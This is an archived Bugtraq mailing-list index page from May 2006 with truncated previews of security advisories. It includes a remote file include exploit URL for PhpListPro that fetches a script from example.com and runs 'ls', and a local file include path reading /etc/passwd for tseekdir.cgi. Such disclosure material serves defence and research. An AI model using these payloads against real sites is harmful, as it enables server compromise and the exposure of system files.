|
|
Colapse all |
Post message
Re: SYMSA-2006-003: Cisco Secure ACS for Windows - AdministratorPassword Disclosure 2006-05-08 Greg owens (gowens covad net) Does this include the ACS appliance engine. Greg Owens, CCNP CCSP CISSP Email:gowens (at) covad (dot) net [email concealed] -------------------------- Sent from my Samsung I730 Wireless Handheld -----Original Message----- >From: "Matthew Cerha"<mcerha (at) cisco (dot) com [email concealed]> >Sent: 5/8/06 6:15:58 PM >To: "bugtraq@securityfocus. [ more ] [ reply ] ZDI-06-014: Verisign I-Nav ActiveX Control Code Execution Vulnerability 2006-05-10 zdi-disclosures 3com com ZDI-06-014: Verisign I-Nav ActiveX Control Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-014.html May 10, 2006 -- CVE ID: CVE-2006-2273 -- Affected Vendor: Verisign -- Affected Products: i-Nav ActiveX Control -- TippingPoint(TM) IPS Customer Protection: TippingP [ more ] [ reply ] Kerio WinRoute Firewall Protocol Inspection Denial 2006-05-07 SnoBMSN Hotmail De Critical: Moderately critical Impact: DoS Where: From remote Solution Status: Vendor Patch Software: Kerio WinRoute Firewall 6.x Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it. Description: A vulnerability has been reported in Kerio [ more ] [ reply ] [48Bits.com Advisory] Path conversion design flaw in Microsoft NTDLL 2006-05-09 48Bits.com [I+D Team] (vulndev 48bits com) Hi, Microsoft Windows NTDLL.DLL is prone to an incorrect path conversion vulnerability. This flaw could be successful exploited by malicious users in order to bypass protection mechanisms implemented by certain antivirus and antispyware products. Advisory can also be located at -> http://www.48bit [ more ] [ reply ] vbulletin security Alert 2006-05-06 aura aria-security net #---------------------------------------------------------- #Discovered by: Aura #ARIA - SECURITY TEAM #Gr33t to: O.U.T.L.A.W & R@1D3N & Smok3r #----------------------------------------------------------- » Vendor: Vbulletin » Summary: vbulletin is a powerfull Forum System »Description [ more ] [ reply ] [TZO-042006] Insecure Auto-Update and File execution 2006-05-09 Thierry Zoller (Thierry Zoller lu) _______________________________________________________________________ Zango Adware - Insecure Auto-Update and File execution _______________________________________________________________________ Reference : TZO-042006-Zango Author : Thierry Zoller Advisory : http://secdev.zoller. [ more ] [ reply ] mybb v1.1.1(showthread.php) SQL Injection Exploit 2006-05-09 Breeeeh hotmail com ---------------------------------- foud by: Breeeeh Site: http://www.alshmokh.com Email: Breeeeh (at) hotmail (dot) com [email concealed] ---------------------------------- $query = $db->query("SELECT pid FROM ".TABLE_PREFIX."posts WHERE tid='$tid' $visible ORDER BY dateline LIMIT $start, $perpage"); whi [ more ] [ reply ] PhpListPro 2.01 Remote File Include Vulnerability 2006-05-08 SnoBMSN Hotmail De Credits: Discovered by: SnoB ->> SnoBmsn (at) hotmail (dot) de [email concealed] http://www.cyber-security.org Vendor URL : SmartISoft http://smartisoft.com Dork/Search for: "PHPListPro ©2001-2006 SmartISoft" Exploit : /config.php?returnpath=http://www.example.com/yourscript.txt?&ls%20-laF /editsite.php?returnpa [ more ] [ reply ] [ MDKSA-2006:084 ] - Updated MySQL packages fix several vulnerabilities 2006-05-10 security mandriva com Cisco Security Advisory: AVS TCP Relay Vulnerability 2006-05-10 Cisco Systems Product Security Incident Response Team (psirt cisco com) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: AVS TCP Relay Vulnerability Advisory ID: cisco-sa-20060510-avs http://www.cisco.com/warp/public/707/cisco-sa-20060510-avs.shtml Revision 1.0 For Public Release 2006 May 10 1600 UTC (GMT) +----------------------------------- [ more ] [ reply ] Re: Milliscript 1.4 Multiple Vulnerabilities 2006-05-10 webmaster milliscripts com Hello, I never read anything else from you. I checked the points you told me (bug in milliscripts redirection when checking $domainname for example), but they are not true. In /include/functions.php, *every* input is checked for validation. The functions are called: check_domain($dname) che [ more ] [ reply ] Re: phpBB 2.0.20 Full Path Disclosure and SQL Errors 2006-05-08 Maksymilian Arciemowicz (max jestsuper pl) On Monday 08 May 2006 04:49, you wrote: > You state these problems exist at php.net and elsewhere, so why is the > subject titled phpbb? Â php.net even recommends that for production sites > displaying of errors is discouraged. Â I'm unsure how your report brings > anything new as you specify the va [ more ] [ reply ] Re: Firefox 1.5.0.3 code execution exploit 2006-05-07 Juha-Matti Laurio (juha-matti laurio netti fi) This URL listed has been updated to include more recent (background) information from Mr. Gavin Sharp on 7th May. The original testcase URL is located at http://www.gavinsharp.com/tmp/ImageVuln2.html now. - Juha-Matti > > try this with Firefox 1.5.0.3 > »www.gavinsharp.com/tmp/ImageVuln.html [ more ] [ reply ] Re: tseekdir.cgi<--Local File Include 2006-05-10 Steven M. Christey (coley mitre org) >foud by: BoNy-m Also apparently found by durito in September 2004, as identified in the Turbo Seek product. > /tseekdir.cgi?id=1055&location=/etc/passwd%00 This is the same exploit vector as what was reported in Secunia SA12500 and BID 11163: http://www.securityfocus.com/bid/11163/exploit [ more ] [ reply ] Oracle - the last word 2006-05-10 David Litchfield (davidl ngssoftware com) A few people have asked me recently what it is I'm actually looking for from Oracle. I have a nice little laundry list of things, of course, but mostly all I've been waiting for is to hear Oracle to say, "We admit we have a problem with regards to security, but here's our strategy and we're going [ more ] [ reply ] Firefox 1.5.0.3 - DoS 2006-05-06 p4 werterxyz gmail com (1 replies) Hackmaster Group DMCounter Remote File Include 2006-05-10 c-w-m hackmaster us Script: DMCounter Version: 0.9.2-b Language: PHP Problem: Remote File Include Vendor: http://Www.HackMaster.Us Discovered by: C-W-M(at)hackmaster(dot)us Description ============= Statistics software based on PHP which does not require any database support but just uses flat files. Daily + m [ more ] [ reply ] Multiple SQL Injection Vulnerabilities in Dreamweaver Generated Code 2006-05-09 Brian Gallagher (brian diamondsea com) Multiple SQL Injection Vulnerabilities in Dreamweaver Generated Code INFORMATION: ------------------------- Class: SQL Injection CVE: CVE-2006-2042 Remote: Yes Local: Yes Published: May 09, 2006 Credit: Brian Gallagher <brian (at) diamondsea (dot) com [email concealed]> Vulnerable: Dreamweaver Ultradev Dreamweaver MX Dre [ more ] [ reply ] [ GLSA 200605-12 ] Quake 3 engine based games: Buffer Overflow 2006-05-10 Sune Kloppenborg Jeppesen (jaervosz gentoo org) |
|
Privacy Statement |
McAfee Avert? Labs Security Advisory
Public Release Date: 2006-05-09
Microsoft MSDTC NdrAllocate Validation Vulnerability
CVE-2006-0034
______________________________________________________________________
? Synopsis
There is an RPC procedure within the MSDTC interface i
[ more ] [ reply ]